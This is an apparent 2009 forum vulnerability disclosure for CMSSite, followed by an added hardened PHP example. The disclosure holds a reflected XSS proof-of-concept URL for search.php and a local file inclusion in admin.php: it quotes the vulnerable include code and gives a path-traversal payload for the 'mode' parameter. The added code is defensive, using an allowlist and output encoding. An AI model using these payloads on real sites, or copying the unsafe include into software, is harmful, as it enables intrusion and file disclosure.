
22.04.2009, 23:21
CMSSite Vulnerabilities
Found by: Dimi4 [UASC]
Date: 22.04.09
XSS (search.php):
Code:
http://localhost/CMSSite/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=0&y=0
LFI: admin.php
PHP code:
if(file_exists("$admin_dir/".$_REQUEST["mode"].".php") && $_REQUEST["mode"] != "delete" && $_REQUEST["mode"] != "logout")
{
    include("$admin_dir/".$_REQUEST["mode"].".php");
}
Code:
/admin.php?mode=[path]//////////////////[..]
__________________
BlackHat. MoDL
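
A hardened form of the admin.php include quoted in the post above, plus output encoding for the search.php "q" value, as an added example that is not part of the original post or CMSSite's own code. `$admin_dir` and the `mode` parameter come from the post; the function names, the module names in the allowlist and the assumption that `q` is echoed into HTML are hypothetical.

```php
<?php
// Added example, not CMSSite code. Function names and the allowlist entries
// below are hypothetical; only $admin_dir and "mode" appear in the post.

const ADMIN_MODES = ['pages', 'users', 'settings']; // hypothetical module names

/**
 * Map a request-supplied mode to a file inside $adminDir, or return null.
 * The value only reaches a path if it matches an allowlist entry exactly.
 */
function resolve_admin_module(string $adminDir, $mode): ?string
{
    // $_REQUEST values can be arrays, so reject anything that is not a string.
    if (!is_string($mode) || !in_array($mode, ADMIN_MODES, true)) {
        return null;
    }
    $base = realpath($adminDir);
    $file = realpath($adminDir . '/' . $mode . '.php');
    // Defence in depth: the resolved file must sit directly in the admin directory.
    if ($base === false || $file === false || dirname($file) !== $base) {
        return null;
    }
    return $file;
}

/** Encode a value for HTML text or a quoted attribute (assumed use of "q"). */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Self-check with constructed inputs when run from the command line.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/cmssite_admin_demo';
    @mkdir($dir);
    file_put_contents($dir . '/pages.php', '<?php // constructed module');
    var_dump(resolve_admin_module($dir, 'pages') !== null); // allowlisted name
    var_dump(resolve_admin_module($dir, '../pages'));       // not in allowlist
    var_dump(resolve_admin_module($dir, ['pages']));        // non-string input
    var_dump(h('"><b>constructed</b>'));                    // markup is encoded
}
```

In admin.php the caller would include the returned path only when it is not null, and search.php would pass the query through `h()` before printing it.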